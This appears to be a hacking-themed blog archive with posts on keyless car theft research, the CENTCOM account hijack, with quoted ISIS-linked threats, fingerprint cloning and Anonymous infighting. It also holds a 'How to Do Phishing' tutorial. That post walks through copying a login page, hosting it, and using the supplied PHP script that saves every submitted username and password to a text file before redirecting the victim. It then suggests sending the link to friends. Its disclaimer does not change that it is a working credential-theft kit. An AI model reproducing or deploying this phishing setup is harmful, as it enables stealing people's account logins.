Michael Lynch, the firm’s identity fraud expert had commented that `the recent Sony security break which had seen a hacker gaining access to the personal data of over 100 million online gamers, that included the people in Britain, has portrayed the increase and widespread danger, hackers tend to pose to consumers as well as businesses.

It is essential to bring about awareness on the risks involved so that adequate steps in the protection of their identities and safeguard their personal data from the hands of these hackers. The technique shown in the live session indicate that these hacking skills could be applied within a few minutes and hence it is critical for consumers to take timely action and protect their data from these hackers.

They use the man in the middle hacking technique which works by the hacker interrupting communication between two users or what an individual is viewing on the internet and as the user logs into their online account, their username as well as password appears also on the hackers’ desktop enabling him to store the information and access the account immediately on some time later.

Monday, 24 August 2015

Thousands of Cars Vulnerable to Keyless Theft, According to Researchers

Car

Cars at Risk of Electronic Hacking

According to computer scientists, thousands of cars inclusive of high end-marques like the Porsches as well as the Maseratis are at risk of electronic hacking, since the research has been stifled for two years by court injunction for fear that it would help thieves to steal vehicles to order. It emphases a weakness in the Megamos Crypto system which is a kind of technology utilised by big manufacturers like Audi, Fiat, Honda, Volvo and Volkswagen.

It is invented to avert a car engine being started without the presence of a keyfob which contains the accurate radio frequency identification chip. Nevertheless, researchers at the Birmingham University and Radbound University in Nijmegen, the Netherlands are capable of intercepting signals that are sent between the chip and the car.

Listening twice enables them to utilise a process of reverse engineering, by using a commercially available computer programmer in order to identify the secret codes that are used in starting the car. According to Director of Cyber Security at the University of Warwick, Tim Watson who told Bloomberg that `it is not a theoretical weakness, it is an actual one it does not cost theoretical dollars to fix, it costs actual dollars’.

Publication Ban Denied Public Crucial Information

In 2012, the flaw had been identified by the researchers though Volkswagen won High Court injunctions in the prevention of its publication one year later. The motoring giant had commented that the work of Flavio Garcia, at Birmingham University and his two Dutch colleagues would allow someone especially a sophisticated criminal gang with the right tools, to break the security and steal a car’.

In reply, the researchers had debated that a publication ban denied the public crucial information with regards to security of their vehicles. Eventually they could reveal their results at the Usenix Security Symposium in Washington at the weekend with a sentence redacted.

`Dismantling Megamos Crypto: Wirelessly Lockpicking a Vehicle Immobiliser’, their paper, gives a description on how they began their research while police state that they were perplexed by the rising numbers of `keyless car theft’.

Chip System to Be Changed

The research had been published on the ground that the ban should block all essential information from the knowledge of the public. According to the Metropolitan Police, around 6000 vehicles seemed to be stolen without keys last year, half of which were all thefts.

The paper concluded that `the implications of the attacks portrayed in the paper were particularly serious for those vehicles having keyless ignition. At some point the mechanical key had been removed from the vehicle though the cryptographic mechanisms had not been strengthened to compensate it.

 It is recommended that the chip system be changed to one which could include a random number generator and thus make it difficult to use intercepted transmission in order to break the codes.

Saturday, 24 January 2015

US Military Social-Media Accounts Hacked


CENTCOM
According to the reports, a hacker group who is claiming to be with the terrorist group ISIS and call themselves as the “Recently, Cyber Caliphate, took the complete control over the operation of Centcom YouTube channel and Twitter account that represents the United States central military command. There was a Pastebin tweeted by the hackers titles as “Pentagon account hacked with a message that, American soldiers, we are coming, now its time when you should watch your back. #CyberCaliphate”. This message included links to what is suppose to be with some confidential US Army files.

However, according to sources, it has come to light that these files might have been made available to public previously, in other words, these files cannot be deemed highly confidential. These files might not be confidential but at the end of the day, it was the files of Centcom’s social accounts that were compromised. This clearly indicates the pathetic state of the cyber security in the United States government. And if the hackers are able to get their hands on some of the most confidential files then it clearly indicates that ISIS is a more dreadful cyber-opponent than anyone can expect.

According to the tweets of Politico reporter Hadas Gold at 9:46AM PST, Twitter is aware of the cyber attack on Centcom and taking necessary steps to work on the issue. According to the update at 10:05AM PST, Twitter was able to remove the cover image and the profile image from Centcom. This was followed by the suspension of the Centcom account at 10:10AM PST. At 10:15AM PST, there was an update posted indicating one of the defense officials has confirmed these attacks to Fusion reported Brett LoGiurato. Brett LoGiurato tweeted that, defense official have confirmed that the United States Central Command Twitter account has been compromised. At 10:35AM PST another update followed indicating that even YouTube has suspended the hacked account of Centcom from YouTube. Around 11:55AM PST, The Next Web’s Matt Navarra tweeted that there has been a request received from Pentagon pertaining to an account security issue and they are working on the issue to resolve it.

Before the accounts could be shut, the following tweets were released from the account: 

1. Pentagon network hacked: Korean scenarios.
2. American soldiers, we are coming to you, now it’s time when you should watch your back.
3. We will not stop; we know everything about you, your wife, and your children.
4. ISIS is already here, we are in your computers, in each of your military base

While the US and its satellites kill our brothers and soldiers in Afghanistan, Syria and Iraq, then we broke into your networks and personal devices and know every information about you. The Cyber-Caliphate has also claimed to have taken control over the US media affiliates of CBS News and Fox in Tennessee. According to one of the Anonymous post left out in Pastebin, “In the name of Allah, the Most Gracious, the Most Merciful, the Cyber-Caliphate under the auspices of ISIS will continues with its Cyber-Jihad.

Friday, 2 January 2015

Hacker Clones a Politician’s Fingerprint Using Normal, Long-Distance Public Photos


Fingerprint
Something of this magnitude can’t expected to have happened in past couple of years but now, according to a member of the Chaos Computer Club, which is a European hacker association (on the similar lines of Cult of the Dead Cow in the united states of America) it is possible.

They have successfully shown that it is quite possible to clone or reproduce anyone’s fingerprints. This clone can be used to break into anyone’s system, which is protected by the biometric fingerprint scanners. They just need the photo of someone’s fingers. According to the club, they do not need any close up photos; any photos with the celebrity waving the hands even from a far distance will do the trick.

Considering this case, the CCC was able to get their hands on the fingerprint of Germany’s defense minister Ursula von der Leyen through a photo, which was taken during a press conference. This could easily be considered as a security breach if the German government uses biometric access control systems.

The findings: 

The findings were presented by Jan “Starbug” Krissler, the hacker at the Chaos communication congress. He was able to recreate the thumbprint of the minister by using a photo of the minister, which was taken at the press conference, and some other photos, which have take the picture of her thumb from multiple angles. He used one of the commercially available software called Verifinger Software.

Jan created a real world dummy by using this thumbprint. He started by printing it on a mask and then exposing the same to create a negative print on a substrate. Then he filled the negative with wood clue and created a new positive fingerprint. In case of testing, this technique can pose serious threat to Apple’s TouchID sensor and just in case the minister has Apple iphone then the company can seriously get her into trouble. By this, the company is hoping that the German government is not relying on fingerprints to control their military systems.

What is the drawback? 

With the digital fingerprint readers becoming very common now and it is being on laptops to high-end expensive smartphones. The biggest problem with fingerprints is that they can give false positive, negative and even multiple readings of the same print and give out different results. Even though fingerprints are the best means of identification, still security and forensic communities are looking forwards towards more techniques that are reliable.

DNA sequencing is being considered a one of the best means of forensic identification, and vein matching and gait analysis are best options for control access. This technique is called living biometrics and as the name suggest it is only valid until the person is alive. This technique is already in use in Poland and Japan at some of their ATM’s.

If you are among the people who are using fingerprints for access control, it might be a good time to switch over to something more reliable.



 

Saturday, 16 August 2014

How to Do Phishing

 Phishing
Phishing simply means creating a fake page of a popular website or company and stealing personal information like username, password, credit card details, and account numbers etc. with the help of that page. Phishing is one of the simplest techniques used by the hacker to hack the account by stealing the login details. Catching a phishing is quite difficult because it has exactly same home page as the original website but yes the link or URL is different. So if you find any such web page displaying the content of the original website but having other abrupt link then you must report to the admin of the site.

Phishing is illegal to practice so please don’t do it. But yes everyone should know that how does it takes place so that they are never caught in the threats. So let us now learn that how phishing is done and how fake page is created but before we begin let me declare:

DISCLAIMER : I am not responsible for any harm caused by the user. The tutorial is purely and only for educational purposes. Please do not misuse this tutorial. 
 

So it’s a kind request from everyone that please don’t misuse it but try to learn it so that you are not affected by this at any instance. So let’s begin:

Firstly you need to have a hosting account. You can also create a free hosting account that is available on many websites, you can simply google it and create an account in any one of them.

Now what hackers do is that they first select the target website like gmail, facebook etc. Once selected, they create the fake page of that original website.

Creating a fake page is quite simple. Just go to any website say Gmail and then right click and select the option “view source code” and then copy all the code in the notepad and save it as target.html.
Now other step is to create a file named “code.php”. Simply open note pad and copy the following
code:

<?php
header ('Location: http://www.xyz.com');

$handle = fopen("names.txt", "a");

foreach($_POST as $variable => $value)
{
fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");

fclose($handle);

exit;

?>

You can replace www.xyz.com with any website you want to direct user to.

Now after copying the following code save it as code.php and now it’s almost done.

Now go to the file target.html and open it because some editing has to be done. Now press ctrl+f and search for “action=” with login written in it. You will observe one link there so replace that link or URL with the file code.php that you have created initially. And now it’s almost done. Also create one file named names.txt where you will get the passwords of the infected user.

Now simply go your hosting account and upload the three files that are: target.html, code.php and name.txt. After they are successfully uploaded it’s ready. Now you will have a link to the fake page like: http://abcxyz.com/target.htm. You can select domain name according to your choice. Now the fake page is ready and now you can submit this link to your friend or anyone else. If he login to this fake page then you can check his username and password in the names.txt file as all the passwords will be stored here.

So this is all about hacking through phishing. But I request you all not to misuse it because it’s illegal and a big cyber-crime. So I hope you will never become the victim of such fake pages. Simply have a look at the link then log in or first reload the page then log in to the account. So in later posts we will also cover some interesting tricks like this so stay connected.

Friday, 18 November 2011

Anonymous attack


Anonymous declares war on an internal group whose actions would be more faithful to the beliefs of the hackers group. Anonymous seems to have more than enough of a few renegades who use his name to initiate actions that the group does not endorse. The attack on Facebook these days, and claimed by some people claiming to belong to Anonymous seems to have been too much for the scope of the group, who decided to respond.

It's a smaller group, claiming to Anonymous and named "AnonOps," which is the center of the controversy. AnonOps is accused of being "gone to the dark side" and being "blind with power who treat newcomers with contempt and arrogance instead of fighting corruption and censorship on the Internet," says Anonymous.